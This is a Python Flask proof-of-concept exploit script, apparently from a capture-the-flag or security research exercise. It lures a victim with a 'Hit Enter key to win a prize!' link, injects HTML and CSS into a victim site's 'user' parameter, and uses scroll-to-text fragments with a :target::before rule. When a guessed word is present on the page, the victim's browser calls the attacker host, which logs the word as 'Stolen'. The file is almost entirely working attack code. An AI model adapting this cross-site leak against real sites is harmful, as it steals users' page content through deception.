poc2_exploit.py

from flask import Flask
from flask import request
import sys

app = Flask(__name__)

VICTIM = "http://victim:5000"
ATTACKER = "http://attacker:1337"

fruits_all = ["Apple","Apricot","Avocado","Banana","Bilberry","Blackberry","Blackcurrant","Blueberry","Boysenberry","Currant","Cherry","Cherimoya"]

def gen_redirect(try_fruit):
    return f"""<script>
    let injection = `
    <style>:target::before {{ content : url({ATTACKER}/receive/{try_fruit}) }}</style>
    <a href='{ATTACKER}/redirect' autofocus><h1>Hit Enter once again!</h1></a>`.replaceAll('\\n', ' ');
    location = `{VICTIM}/?user=${{encodeURIComponent(injection)}}#:~:text={try_fruit}`;
</script>
    """

i = 0
extracted_fruits = []

@app.route('/redirect')
def redirect():
    global i
    i+=1
    return gen_redirect(fruits_all[i-1]) if i <= len(fruits_all) else "Thank you for cooperation"

@app.route('/')
def solve():
    return f"""<a href='{ATTACKER}/redirect' autofocus>Hit Enter key to win a prize!</a><script>"""

@app.route('/receive/<word>')
def receiver(word):
    global extracted_fruits
    extracted_fruits.append(word)
    print("Stolen: ", extracted_fruits, flush=True, file=sys.stdout)
    return "ok"